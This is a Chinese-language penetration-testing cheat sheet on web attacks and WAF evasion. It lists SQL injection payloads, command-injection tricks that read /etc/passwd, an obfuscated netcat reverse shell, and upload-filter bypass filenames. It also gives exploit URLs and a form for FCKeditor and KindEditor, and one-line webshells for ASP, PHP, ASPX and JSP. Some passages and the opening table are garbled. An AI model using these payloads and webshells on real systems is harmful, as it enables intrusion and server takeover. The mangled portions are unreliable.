I 數據庫類型丨連接符丨注釋符號丨其他特殊方式丨唯一的默認表變量和函數 I MSSQL| %2B (URL加號編碼) | -- | 待補充丨@@PACK_RECEIVED I MYSQL| %20 (URL空格編碼)丨# / -- | 待補充 | CONNECTION_ID() I Oracle I %7C (URL豎線編碼) | -- 待補充 | BITAND(1,1) I PGsql | %7C (URL豎線編碼) | -- |ad1::int=1 | getpgusername() | Access | %26 (URL與號編碼) | N/A | 待補充 | msysobjects

為避免被wa攔截以及封禁P,注入建議不首先使用and以及o語句。

可用如下方式替換:

數字型注入:

?id=2*2?id=4

字符型注入,根據上表判斷】

?key=wo'+'rd?key=wo'||'rd?key=wo' 'rd

Mysql

?id=ord('a')=97 ?id=123+AND+1=1 ?id=123+&&+1=1 ?id='=’?id=123+AND+md5(‘a’)!= md5(‘A’) ?id=123+and+len(@@version)>1 ?id=1’||1=’1 ?id=123‘+like+'123 ?id=123'+not+like+'1234 ?id='aaa'<>'bbb'?id=123/*! union all select version() */-- ?id=123/*!or*/1=1; ?id=(1)union(((((((select(1), hex(hash)from(users)))))))) ---7個+8個括號 ?id=1+union+(select’1‘,concat(login,hash)from+users) ?id=1+%55nion(%53elect 1, 2, 3)-- -?id=1/*!000000union*/select%0d%0a/*asdas/asd asasd*/version() ?id=1 union(select%0aall{x users}from{x ddd})

Mysql常用函數
字符串處理:

?key=user' OR mid(password,1,1)='*'?key=user' OR mid(password,1,1)=0x2a?key=user' OR mid(password,1,1)=unhex('2a') ?key=user' OR mid(password,1,1) regexp '[*]'?key=user' OR mid(password,1,1) like '*' ?key=user' OR mid(password,1,1) rlike '[*]'?key=user' OR ord(mid(password,1,1))=42 ?key=user' OR ascii(mid(password,1,1))=42 ?key=user' OR find_in_set('2a',hex(mid(password,1,1)))=1?key=user' OR position(0x2a in password)=1?key=user' OR locate(ox2a,password)=1 ?key=user' OR substring((select 'password'),1,1) = 0x70 ?key=user' OR substr((select 'password'),1,1) = 0x70 ?key=user' OR mid((select 'password'),1,1) = 0x70 ?key=user' OR strcmp(left('password',1), 0X69) = 1 ?key=user' OR strcmp(left('password',1), 0×70) = 0?key=user' OR strcmp(left('password',1), 0x71) = -1

命令執行

‘ (單引號)以及 \ (反斜杠)繞過

$ echo orleven orleven$ echo o'r'l'e'v'e'n'' oreven $ /b'i'n/c'a't/e't'c/p'a's's'w'd' root: x: 0: 0: root: /root:/bin/bash daemon: x: 1: 1: daemon: /usr/sbin: /usr/sbin/nologin bin: x: 2: 2: bin:/bin: /usr/sbin/nologin $ /b\i\n/c\at /et'c'/pa's'swd root: x: 0: 0: root: /root: /bin/bash daemon: x: 1: 1: daemon: /usr/sbin: /usr/sbin/nologin bin: x: 2: 2: bin:/bin: /usr/sbin/nologin

? 、 * 、 [、 ]、 ^、 - 通配符繞過
問號最好只匹配到唯一一條

$ /b??/c?t /etc/??ss?droot: X: 0: 0: root: /root: /bin/bash daemon: x: 1: 1: daemon: /usr/sbin: /usr/sbin/nologin bin: X: 2: 2: bin:/bin: /usr/sbin/nologin $ /???/n? -e /???/b??h 2130706433 1337 # /bin/nc -e /bin/bash 127.0.0.1 1337

$ 不存在的符號

cat $u/etc$u/passwd$u root: x: 0: 0: root: /root: /bin/bash daemon: x: 1: 1: daemon: /usr/sbin: /usr/sbin/nologin bin: x: 2: 2: bin: /bin: /usr/sbin/nologin

; 分號執行

$ cat /etc/passwd;ls .......mysql:x:110:115:MySQL Serve,,,:/nonexistent:/bin/false a.out go gobuster gopath soft sqlmap.log tool

文件上傳繞過

文件名繞過

1)文件名加回車 2)shell.php(%80-%99).jpg 繞過 3)如果有改名功能,可先上傳正常文件,再改名 4)%00 5)00(hex) 6)長文件名(windows 258byte | linux 4096byte ),可使用非字母數字,比如中文等最大程 度的拉長。 7)重命名

腳本后綴

Php/php3/php/php5/php6/pht/phpt/phtml asp/cer/asa/cdx/aspx/ashx/ascx/asax jsp/jspx/ispf

解析漏洞

服務器特性:
1.會將Request中的不能編碼部分的%去掉
2.Request中如果有unicode部分會將其進行解碼

IIS

lIS6.0兩個解析缺陷:目錄名包含asp、.asa、.cer的話,則該目錄下的所有文件都將按照asp解析

例如:

/abc,asp/1.jpg 會當做 /abc,asp 進行解析
/abc.php/1.jpg 會當做 /abc.php 進行解析

Apache1.X.2.X解析漏洞

Apache在以上版本中,解析文件名的方式是從后向前識別擴展名,直到遇見Apache可識別的擴展名為止

Nginx

以下Nginx容器的版本下,上傳一個在waf白名單之內擴展名的文件shell. jpg,然后以shell.j pg.php進行請求

? Nginx 0.5.* ? Nginx 0.6.* ? Nginx 0.7 <= 0.7.65 ? Nginx 0.8 <= 0.8.37

以上Nginx容器?的版本下,上傳?個在waf白名單之內擴展名的文件shell.jpg,然后以shell.jpg%20.php進行請求

? Nginx 0.8.41 – 1.5.6:

以上Nginx容器的版本下,上傳一個在waf白名單之內擴展名的文件shell.jpg,然后以shell.jpg%20.php進行請求


PHP CGI 解析漏洞

IIS 7.0/7.5 Nginx < 0.8.3

以上的容器版本中默認php配置文件cgi.fix_pathinfo=1時,上傳一個存在于白名單的擴展名文件shell.jpg,在請求時以shell.jpg/shell.php請求,會將shell.jpg以php來解析

https://xz.aliyun.com/t/337

系統特性:利用NTFS ADS特性

ADS是NTFS磁盤格式的一個特性,用于NTFS交換數據流。在上傳文件時,如果waf對請求正文的filename匹配不當的話可能會導致繞過

test.asp. test.asp(空格) test.php:1.jpg test.php: $DATA test.php_


參考文章:

https://xz.aliyun.com/t/1189

協議解析不一致,繞過waf(注入跨站也可嘗試)

因為這種不僅僅存在于上傳之處,注入跨站也可嘗試

垃圾數據

-------------WebkitFormBoundaryFADasdasdasDdasdContent-Disposition: form-data; name="file", filename=abc.php’;aaaaaaaaaaaaaaaa Content-Type: application/octet-stream;<?php phpinfo(); ?> -------------WebkitFormBoundaryFADasdasdasDdasd

文件類型繞過/Header 頭類型

修改文件類型繞過/Header頭的Content-Type,多次嘗試:

Content-Type:application/x-www-form-urlencoded;Content-Type:multipart/form-data; Content-Type:application/octet-stream;

未解析所有文件

multipart協議中,一個POST請求可以同時上傳多個文件。如圖,許多WAF只檢查第一個上傳文件,沒有檢查上傳的所有文件,而實際后端容器會解析所有上傳的文件名,攻擊者只需把paylaod放在后面的文件PART,即可繞過

https://blog.csdn.net/qq_32393893/article/details/81625047

不規則Content-Disposition文件名覆蓋

-------------WebkitFormBoundaryFADasdasdasDdasdcontent-Dispositiona:form-data; name="file"; filename='abc.jpg' Content-Disposition:form-data; name="file"; filename=abc.php'Content-Type: application/octet-stream; <?php phpinfo(); ?> -------------WebkitFormBoundaryFADasdasdasDdasd

https://weibo.com/ttarticle/p/show?id=2309404007261092631700

文章講解了Content-Disposition各種不規則繞過方法


boundary 繞過

boundary邊界不一致(Win2k3 + llS6.0 + ASP)

1)%u特性: iis支持對unicode的解析,如:payload為[s%u006c%u0006ect],解析出來后則是[select]%u0061nd 1=1另類%u特性: unicode在iis解析之后會被轉換成multibyte,但是轉換的過程中可能出現:多個widechar可能會轉換為同一個字符。如:select中的e對應的unicode為%u0065,但是%u00f0同樣會被轉換成為e s%u00f0lectiis+asp2)%特性: union selec%t user fr%om dd #iis+asp asp+iis環境下會忽略掉百分號,如:payload為[sele%ct], 解析出來后則是[select]3)asp/asp.net在解析請求的時候,允許Content-Type: application/x-www-form-urlencoded的數據提交方式select%201%20from%20userasp/asp.net request解析: 4)在asp和asp.net中獲取用戶的提交的參數一般使用request包,當使用request(‘id’)的形式獲取包的時候,會出現GET,POST分不清的情況,譬如可以構造一個請求包,METHOD為GET,但是包中還帶有POST的內容和POST的content-type, 換一種理解方式也就是將原本的post數據包的method改成GET,如果使用request(‘id’)方式獲取數據,仍會獲取到post的內容

php+apache畸形的boundary:
php在解析multipart data的時候有自己的特性,對于boundary的識別,只取了逗號前面的內容,例如我們設置的boundary為—-aaaa,123456,php解析的時候只識別了—-aaaa,后面的內容均沒有識別。然而其他的如WAF在做解析的時候,有可能獲取的是整個字符串,此時可能就會出現BYPASS

Content-Type: multipart/form-data; boundary=------,xxxxContent-Length: 191------,xxxxContent-Disposition: form-data; name="img"; filename="img.gif"GIF89a------Content-Disposition: form-data; name="id"1' union select null,null,flag,null from flag limit 1 offset 1-- ---------------,xxxx--

畸形method(header頭中)

某些apache版本在做GET請求的時候,無論method為何值均會取出GET的內容。如請求的method名為DOTA,依然會返回GET方法的值,即,可以任意替換GET方法為其它值,但仍能有效工作,但如果waf嚴格按照GET方法取值,則取不到任何內容

參考文章:

https://xz.aliyun.com/t/2418

文件名覆蓋繞過


參考文章:

https://xz.aliyun.com/t/15

文件名回車

Content-Disposition: form-data; name=img"; filename="img.ph p"

遺漏文件名

當AF遇到"name=" myfile";"時,認為沒有解析到 filename。而后端容器繼續解析到的文件名是t3jsp,導致WAF被繞過

content-Disposition: form-data; name="myfile";; filename="t3. jsp"

其他類型繞過

以下均某一漏洞類型為例,具體皆可應用于XSS、SQL注入、命令執行等漏洞

參數繞過

PHP

?%20value=payload

ASP

?%value=payload ?%}9value=payload

參數溢出

?id=111111111111111111111 (長很長) and 1=1 ?id=1111111111 union %23xxxxxxxxxxxxx (很長很長) xxxx%0d select 等

參數截斷

http://example.com/file%00.txt

HPP HTTP參數污染/拼接繞過

(以Mysql為例)

?id=123+union+select+1,2,3+from+table?id=123+union+select+1&id=2,3+from+table?id=123+union+select/*&id=*/user&id=pass/*&id=*/from/*&id=*/users id=select/*,*/.............

這是中間件與參數拼接的關系圖


HPF HTTP分割注繞過

這種方法是HTTP分割注入,同CRLF有相似之處(使用控制字符%0a、%0d等執行換行)
舉例:

/?a=1+union/&b=/select+1,pass/&c=/from+users–select * from table where a=1 union/* and b=/select 1,pass/ limit */from users—

看罷上面兩個示例,發現和HPP最后一個示例很像,不同之處在于參數不一樣,這里是在不同的參數之間進行分割,到了數據庫執行查詢時再合并語句

參考文章:

https://zhuanlan.zhihu.com/p/79356937

最后另類繞過合集

路徑系列:

?path=/path/././././blah/blah/blah/../../../vuln.php/path: /vuln. php?value=PAYLOAD /path/;lol=lol/vuln. php?value=PAYLOAD /path/vuln.php/lolol?value=PAYLOAD /path/vuln.php;lol=lol?value=PAYLOAD

編碼繞過

URL Encode - %27 Double URL Encode - %2527 UTF-8 (2 byte) - %c0%a7 UTF-8 (JAVA) - \ uc0a7 HTML Entity - &apos;HTML Entity Number - &#27; Decimal - $#39Unicode URL Encoding - %u0027 Base64 - Jw==

iis+asp(x)

%u 特性:

iis支持對unicode的解析,如:payload為 s%u006c%u0006ect,解析出來后則是 select

另類%u特性: unicode在iis解析之后會被轉換成multibyte,但是轉換的過程中可能出現:多個widechar可能會轉換為同一個字符

如: selec中的e對應的unicode為%u0065,但是%u00f0同樣會被轉換成為e

s%u0065lect->select s%u00f0lect->select

WAF層可能能識別s%u0065lect的形式,但是很有可能識別不了s%u00f0lect的形式。這樣就可以利用起來做WAF的繞過

常見三個關鍵字(union+select+from)的測試情況:

s%u0045lect = s%u0065lect = %u00f0lect u --> %u0055 --> %u0075 n -->%u004e --> %u006e i -->%u0049 --> %u0069 o -->%u004f --> %u006f -->%u00ba s -->%u0053 --> %u0073 l -->%u004c --> %u006c e -->%u0045 --> %u0065-->%u00f0 c -->%u0043 --> %u0063 t -->%u0054 -->%u0074 -->%u00de -->%u00fe f -->%u0046 -->%u0066 r -->%u0052 -->%u0072 m -->%u004d -->%u006d

asp/asp.net解析請求

asp/asp.net在解析請求的時候,允許Content-Type: application/x-www-form-urlencoded的數據提交方式select%201%20rom%20user


大小寫變化(非WAF,僅過濾繞過)

?id=<sCripT>AleRt(123)</scRIpt> ?id=123 uni0n SeLEcT BaNneR FroM v$vERsIon whERe ROwNUm=1

加粗樣式嵌套(非WAF,僅過濾繞過)

另類

?id=1+un/**/ion+sel/**/ect+1,2,3--

針對中間分析設備

Get /test HTTP/1.1 > GET test,randkey.yourloggingdomain.com Get /test HTTP/1.1 > GET http://test.randkey.yourloggingdomain.com Get /test HTTP/1.1 > GET @test.randkey.yourloggingdomain.com

分析設備拼接后:

host.test.randkey.yourloggingdomain.com

參考文章:

https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF https://mp.weixin.qq.com/s/e1jy-DFOSROmSvvzX_Ge5g

2.2.5 登錄口JS前端加密繞過

概述

滲透測試過程中遇到web登錄的時候,現在很多場景賬號密碼都是經過js加密之后再請求發送(通過抓包可以看到加密信息)如圖一burp抓到的包,request的post的登錄包,很明顯可以看到password參數的值是經過前端加密之后再進行傳輸的,遇到這種情況,普通發包的爆破腳本就很難爆破成功。鑒于這種情況,這邊分析四種方式進行繞過加密爆破


參考文章:大概能分為以下四種方法

https://www.freebuf.com/articles/web/127888.html

我將幾種方法口語化簡述下:

1)既然是前端s加密,代碼我們都能看得到,我們搭個服務器,每次發包前,把要發送的加密參數用服務器加密一遍,我們再把加密后的參數發送過去,這樣相當于本地還原了加密過程

2)利用selenium webdriver等完全模擬人工輸入,字典也可以自定義,不過需要自己寫腳本而已,這種方法比較萬能

3)這種方法適合有js功底的同學,首先把他的js加密過程跟方法看懂,然后本地簡化或者用其他語言模擬他的加密過程,再自己寫腳本去跑,或者生成加密后的字典直接burp去跑即可

4)前人栽樹,后人乘涼,cony1老哥為了方便后輩,寫了一款burp插件, https://github.com/c0ny1/jsENcrypter,名為jsEncrypter,簡單來說就是把1,3點結合了一下,用插件方便地跑起來

jsEncrypter安裝與本地測試 (dayu-Sixth day)

這里重點介紹第四種方法

1)首先得安裝 maven,mac下直接 brew install maven
安裝連接:
https://www.runoob.com/maven/maven-setup.html

按照文檔三種系統都有安裝方法

1)安裝好maven后,把jsEncrypter git clone回來或者下載回來解壓縮,然后在他的文件夾下,打開cmd窗口,然后運行mvn package,就可以把插件編譯成型,編譯好后會多出一個target文件夾

命令:mvn package

這里不演示下去了…詳細的查看文章…

https://fucker-shamo.github.io/2019/08/04/登陸口js前端加密繞過/

中間復現會遇到的一些問題:
安裝phantomJS環境變量參考:https://blog.csdn.net/xc_zhou/article/details/80700640

參考鏈接:

http://gv7.me/articles/2018/fast-locate-the-front-end-encryption-method/ https://www.freebuf.com/articles/web/184455.html https://bbs.ichunqiu.com/thread-42457-1-3.html http://gv7.me/articles/2017/jsEncrypter/ https://www.freebuf.com/articles/web/127888.html https://www.cnblogs.com/xiaozi/p/9158988.html

2.2.6 XMLDecoder 標簽、POC

詳細介紹以下內容:
標簽類型:
1)java
2)array
3)class
4)object
5)void
6)new
7)field
8)method
9)property
10)byte
11)其余數據類型

XML的基本語法
XML簡單利用

詳細文章:

https://xz.aliyun.com/t/7944

該文章全面的介紹了XMLDecoder遇到的基礎知識…了解后我們開始看下面的CVE解析文章

http://xxlegend.com/tags/XMLDecoder/ --CVE-2019-2725、Weblogic XMLDecoder RCE分析 https://payloads.info/2020/07/01/Java安全-反序列化篇-XMLDecoder到Weblogic幾個補丁的繞過分析/ 文章非常詳細的POC

2.2.7 phpMyAdmin去getshell

前言

在學習sql語句之前,拿到phpmyadmin弱口令登錄到后臺卻不知道怎么利用,學習之后卻有了新的想法利用phpMyadmin getshello接下去來驗證自己的猜想

phpMyAdmin的簡介
phpMyAdmin 是一個以PHP為基礎,以Web-Base方式架構在網站主機上的MySQL的數據庫管理工具,讓管理者可用Web接口管理MySQL數據庫。借由此Web接口可以成為一個簡易方式輸入繁雜SQL語法的較佳途徑,尤其要處理大量資料的匯入及匯出更為方便。其中一個更大的優勢在于由于phpMyAdmin跟其他PHP程式一樣在網頁服務器上執行,但是您可以在任何地方使用這些程式產生的HTML頁面,也就是于遠端管理MySQL數據庫,方便的建立、修改、刪除數據庫及資料表。也可借由phpMyAdmin建立常用的php語法,方便編寫網頁時所需要的sql語法正確性。

詳細文章:

https://xz.aliyun.com/t/3283 https://my.oschina.net/u/4196756/blog/4408564 --近期最新文章復現講解 https://zhuanlan.zhihu.com/p/25957366

2.2.8 攻擊JWT的一些方法


詳細文章:

https://xz.aliyun.com/t/6776

該文章中REF有詳細鏈接,以及針對JWT的爆破密匙工具c-jwt-cracker也有詳細鏈接介紹等


2.2.9 上傳漏洞

上傳技巧

大小寫混淆%00截斷 上傳.htaccess分布式部署文件 圖片文件頭:47 49 46 38 39 61 (gif)、FF D8 FF E0 00 10 4A 46 49 46 (jpg) 、89 50 4E 47 (png) 其他解析格式:cer、asa、php4、php3、php5、phtml、jspx修改(Content-type)MIME 目錄回溯符 filename="../backdoor. php"

編輯器漏洞

百度編輯器 Ueditor

controller.ashx?action=catchimage

FCKeditor

查看版本

/fckeditor/editor/dialog/fck_about.html /fckeditor/_Whatsnew.html

上傳頁面
常用的上傳地址:

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.aspFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 測試通過) JSP 版:FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp注意紅色部分修改為FCKeditor 實際使用的腳本語言,藍色部分可以自定義文件夾名稱也可以利用../..目錄遍歷,紫色部分為實際網站地址。 FCKeditor 中test 文件的上傳地址FCKeditor/editor/filemanager/browser/default/connectors/test.htmlFCKeditor/editor/filemanager/upload/test.htmlFCKeditor/editor/filemanager/connectors/test.htmlFCKeditor/editor/filemanager/connectors/uploadtest.html 一般很多站點都已刪除_samples 目錄,可以試試。FCKeditor/editor/fckeditor.html 不可以上傳文件,可以點擊上傳圖片按鈕再選擇瀏覽服務器即可跳轉至可上傳文件頁。

參考文章:

https://cloud.tencent.com/developer/news/210677

上傳的思路

Version 2.2 版本

Apache+linux 環境下在上傳文件后面加個.突破!測試通過

Version <=2.4.2 For php

在處理PHP 上傳的地方并未對Media 類型進行上傳文件類型的控制,導致用戶上傳任意文件!將以下保存為html文件,修改action地址

<form id="frmUpload" enctype="multipart/form-data" action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> </form>

FCKeditor 文件上傳.變_下劃線的繞過方法

很多時候上傳的文件例如:shell.php.rar 或shell.php;.jpg 會變為shell_php;.jpg 這是新版FCK 的變化

提交shell.php+空格繞過,不過空格只支持win 系統 *nix 是不支持的[shell.php 和shell.php+空格是2 個不同的文件 未測試

繼續上傳同名文件可變為shell.php;(1).jpg 也可以新建一個文件夾,只檢測了第一級的目錄,如果跳到二級目錄就不受限制

Version 2.4.1 測試通過

修改CurrentFolder 參數使用 …/…/ 來進入不同的目錄

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

根據返回的XML 信息可以查看網站所有的目錄

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

也可以直接瀏覽盤符
JSP 版本

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

Fckeditor 2.0 <= 2.2

允許上傳asa、cer、php2、php4、inc、pwml、pht 后綴的文件上傳后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而沒有使用$sExtension為后綴.直接導致在windows下在上傳文件后面加個.來突破(這里點點很重要)

而在apache 下,因為"Apache 文件名解析缺陷漏洞"也可以利用之,另建議其他上傳漏洞中定義TYPE 變量時使用File 類別來上傳文件,根據FCKeditor 的代碼,其限制最為狹隘

在上傳時遇見可直接上傳腳本文件固然很好,但有些版本可能無法直接上傳可以利用在文件名后面加.點或空格繞過,也可以利用iis6 解析漏洞建立xxx.asp文件夾或者上傳xx.asp;.jpg

參考文章:

https://www.cnblogs.com/zpchcbd/p/11745119.html

KindEditor

上傳頁面

kindeditor/asp/upload_json.asp?dir=filekindeditor/asp.net/upload_json.ashx?dir=filekindeditor/jsp/upload_json.jsp?dir=filekindeditor/php/upload_json.php?dir=file

上傳思路
kindeditor<=4.1.5

curl -F"imgFile=@1.html"http://127.0.0.1/test/kindeditor/php/upload_json.php?dir=file

參考文章:

https://www.sinesafe.com/article/20190510/Kindeditor.html https://www.freebuf.com/column/202148.html --上傳思路

2.2.9.1 上傳漏洞總結

上傳總結

概要說明

文件上傳漏洞可以說是日常滲透測試用得最多的一個漏洞,因為用它獲得服務器權限最快最直接

Asp一句話

<%eval request(“kkk”)%> kkk

Php一句話:

<?php eval($_POST[666]);?> 666

Aspx一句話:

<%@ Page Language="Jscript"%><%eval(Request.Item["111"],"unsafe");%>

Jsp一句話:

<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>

參考一句話:

https://my.oschina.net/u/4373914/blog/3467075

服務端的上傳驗證

1)白名單驗證定義允許上傳的后綴類型,除此所有后緩都不允許

2)黑名單驗證

定義不允許上傳的后綴類型,除此之類其他后綴都可以上傳

定義不允許上傳的后綴:

asp、aspx、asa、cer、cdx、ash

【突破方法】

未重命名可以配合解析漏洞(很少)

可以用cer達到繞過效果

如果未用轉換函數強制轉換后綴為小寫(ASP)

特殊后綴達到效果可利用ashx來生成一句話

.htaccess來實現后綴引導。上傳jpg可以解析成腳本,具體在內容定義

3)文件頭驗證

4)文件類型驗證
例如可以把php的文件類型改成正常的圖片類型

5)文件后綴驗證

典型的白名單驗證,指定上傳后綴必須為jpg、JPG、jpeg、JPEG

類似圖吧…

6)js前端驗證

Js在前端定義了允許上傳的后綴類型

【突破方法】直接在前端修改或添加后綴,找不到就搜索圖片后綴如jpg


上傳繞過姿勢

服務器解析漏洞(IIS5.x-6.x Apache Nginx IIS7.0/7.5)
1)IIS5.x-6.x解析漏洞

使用iis5.x-6.x版本的服務器,大多為windows server 2003,網站比較古老,開發語句一般為asp;該解析漏洞也只能解析asp文件,而不能解析aspx文件。

目錄解析(6.0)
形式:www.xxx.com/xx.asp/xx.jpg
原理: 服務器默認會把.asp,.asa目錄下的文件都解析成asp文件。

文件解析
形式:www.xxx.com/xx.asp;.jpg
原理:服務器默認不解析;號后面的內容,因此xx.asp;.jpg便被解析成asp文件了。

解析文件類型
IIS6.0 默認的可執行文件除了asp還包含這三種 :
/test.asa
/test.cer
/test.cdx

修復方案

禁止用戶控制文件上傳目錄,新建目錄等權限 上傳目錄與用戶新建的目錄禁止執行 上傳的文件重命名,不保留用戶上傳文件的后綴 禁止asa、asp、cer、cdx等后綴的文件上傳

2)Apache解析漏洞

漏洞原理 
Apache 解析文件的規則是從右到左開始判斷解析,如果后綴名為不可識別文件解析,就再往左判斷。比如 test.php.owf.rar “.owf”和”.rar” 這兩種后綴是apache不可識別解析,apache就會把wooyun.php.owf.rar解析成php。

漏洞形式

www.xxxx.xxx.com/test.php.php123

其余配置問題導致漏洞
(1)如果在 Apache 的 conf 里有這樣一行配置 AddHandler php5-script .php 這時只要文件名里包含.php 即使文件名是 test2.php.jpg 也會以 php 來執行。
(2)如果在 Apache 的 conf 里有這樣一行配置 AddType application/x-httpd-php .jpg 即使擴展名是 jpg,一樣能以 php方式執行

一個文件名為xxxx1.2x.x3的文件(例如: Index.php.fuck),Apache會從x3的位置往×1的位置開嘗試解析,如果x3不屬于 Apache能解析的擴展名,那么 Apache會嘗試去解析×2的位置,這樣一直往前嘗試,直到遇到一個能解析的擴展名為止

WampServer2.0AllVersion(WampServer2.0i/Apache2 2.11) Wamp Server2.1AllVersion(Wamp Server2.1e-X32/Apache2 2.17) Wamp5AllVersion(Wamp5_1.7.4/Apache2 2.6) AppServ2.4All Version(AppServ-2.4.9/Apache2.0.59) AppServ2.5AllVersion(AppServ-2.5.10/Apache2.2.8) AppServ2.6AllVersion(AppServ-2.6.0/Apache 2.2.8)

以上集成環境都存在擴展名解析順序漏洞,并且這些環境都存在對ρhp3文件按照php來解析這個小洞。該方法針對黑名單不全時,能夠繞過

總結存在該漏洞的 Apache版本:

Apache2.0.x<=2.0.59 Apache2.2.X<=2.2.17

3)nginx 解析漏洞

漏洞原理

Nginx默認是以CGI的方式支持PHP解析的,普遍的做法是在Nqinx配置文件中通過正則匹配設置SCRIPT_FILENAME,當訪問www.xx.com/phpinfo.jpg/1.php這個URL時,$fastcgi.script_name會被設置為"phpinfo.jpg/1.php”,然后構造成SCRIPT_FILENAME傳遞給 PHP CGI,但是PHP為什么會接受這樣的參數,并將phpinfo.jpg作為PHP文件解析呢?這就要說到fix_pathinfoi這個選項了

如果開啟了這個選項,那么就會觸發在PHP中的如下邏輯:

PHP會認為SCRIPT_FILENAME是phpinfo.jpg,而1.php是PATH_INFO,所以就會將phpinfo.jpg作為PHP文件來解析了

漏洞形式

www.xxxx.com/UploadFiles/image/1.jpg/1.phpwww.xxxx.com/UploadFiles/image/1.jpg%o00.phpwww.xxxx.com/UploadFIles/image/1.jpg/%20\0.php

4)IIS7.5 解析漏洞

IS7.0/7.5是對php解析時有一個類似于Nginx的解析漏洞,對任意文件名只要在URL后面追加上字符串"/任意文件名.php"”就會按照php的方式去解析(例如:webshell.jpg/x.php)

IIS7.0(Win2008R1+IIS7.0)

IIS7.5(Win2008R2+IIS7.5)

IlS的解析漏洞不像Apache那么模糊,針對IIS6.0,只要文件名不被重命名基本都能搞定。這里要注意一點,對于"任意文件名/任意文件名.php"這個漏洞其實是出現自php-cgi的漏洞,所以其實跟IIS自身是無關的


文件擴展名繞過(asp、aspx、php、jsp)

1)asp

#IIS 5.0/6.0

#文件解析

.asp;.jpg .asp.jpg .asp;jpg

#目錄解析

.asp/1.jpg

#大小寫繞過

asPx

#截斷

1.asp%00.jpg

#空格繞過

1.asp .jpg1.asp_.jpg (_代替空格,只在windows下有效,因為windows系統自動去掉不符合規則符號后面的內容)

#黑名單繞過(替代asp):
IIS6.0 默認的可執行文件除了asp還包含這三種:

asacercdxashxasmx

#IIS put 上傳

#asaspp

#filename換位置放到content-type 的下一行

#+1.asp;+2.jpg

#雙文件上傳

#RTOL


2)aspx
#IIS 5.0/6.0

#文件解析

.aspx;.jpg .aspx.jpg .aspx;jpg

#目錄解析

.aspx/1.jpg

#大小寫繞過

asPx

#截斷

1.aspx%00.jpg

#空格繞過

1.aspx.jpg1.aspx_.jpg (_代替空格,只在windows下有效,因為windows系統自動去掉不符合規則符號后面的內容)

#黑名單繞過(替代asp):
IIS6.0 默認的可執行文件除了asp還包含這三種:

asacercdxashx (生成aspx文件,見waf繞過)asmxhtrasax

#IIS put 上傳

#asaspp

#filename換位置放到content-type 的下一行

#+1.aspx;+2.jpg

#asaspxpx

#雙文件上傳

#RTLO


3)php
#大小寫

pHp

#黑名單繞過(替代php):

php1php2php3php4php5

#空格繞過(只有在windows下有效,因為windows系統自動去掉不符合規則符號后面的內容)

1.php .1.php.1.php. .1.php .jpg1.php_.jpg (_代替空格)1.php.jpg1.php jpg1.php. .jpg111.php&amp,#x2e;jpg

#十六進制繞過 點繞過

1.php&#x2e;jpg

#解析漏洞

1.jpg/.php (nginx)1.php.123 (apache)1.jpg/php1.jpg/1.php1.jpg%00.php

#截斷

1.php%00.jpg

#利用不符合windows文件命名規則繞過

1.php:1.jpg1.php::$DATA1.php::DATA......

#回車

1.ph回車p

#上傳 .htaccess:(僅在Apache,例如a_php.gif,會被當成php執行)

.htaccess內容

<FilesMatch "_php.gif"> Sethandlerapplication/x-httpd-php</FilesMatch>

#IIS put上傳

#文件包含waf(見6、文件包含繞過)


4)jsp
#兩個jsp包含中間的jpg

.jsp.jpg.jsp

#黑名單繞過(替代jsp):

jspa ]sps jspx jspf

#put上傳(Apache Tomcat 7.0.0 - 7.0.81)

%20 Put /test1.jsp%20 HTTP/1.1 ::$DATA Put /test2.jsp: : SdatA Http/1.1 Put /test3. isp/ Http/1.1 Put/test3.jsp.http:/1.1

Content-Disposition、content-type、文件內容檢測、雙文件

1)Content-Disposition

將form-data; 修改為-form-data 替換form-data 為* 即: Content-Disposit 將form-data;name="file"; 分號后面 增加或減少一個空格 將Content-Disposition:form-data 冒號后面 增加或減少一個空格 將Content-Disposition 修改為content-Dispositionfilename回車="1.php" (過阿里云waf) filename="1.php回車" (過百度云waf) filename="1.jpg";filename="1.php" 雙參數 多個Content-Dispostion

參考鏈接:https://www.secpulse.com/archives/117827.html


2)Content-Type

php: application/octet-stream

將Content-Type修改為image/gif,或者其他允許的類型。 或者刪除整行! 刪除掉ontent-Typ:image/jpeg只留下c,將.php加c后面即可,但是要注意額,雙引號要跟著c.p 將 Content-Type 修改為 content-Type 將 Content-Type:application/octet-stream 冒號后面 增加一個空格

3)文件內容
傳圖馬

4)雙文件

http://www.webshell1414.com/2017/10/16/上傳繞過之雙文件上傳/

客戶端檢測(JavaScript檢測)(dayu-Seventh day)

這類檢測,通常是在上傳頁面里含有專門檢測文件上傳的JavaScript代碼,最常見的就是檢測擴展名是否合法,示例代碼如下:

function check() {var filename = document.getElementById("file");var str = filename.value.split(".");var ext = str[str.length-1];if(ext=='jpg'||ext=='png'||ext=='jpeg'||ext=='gif'){return true;}else{alert("僅允許上傳png/jpeg/gif類型的文件!")return false;}return false; }

判斷該類檢測的方法:選擇一個禁止上傳類型的文件上傳,當點擊確定按鈕之后,瀏覽器立即彈窗提示禁止上傳,一般就可以斷定為客戶端JavaScript檢測,進一步確定可以通過配置瀏覽器HTTP代理(沒有流量經過代理就可以證明是客戶端JavaScript檢測)。

繞過方法:

上傳頁面,審查元素,修改JavaScript檢測函數;
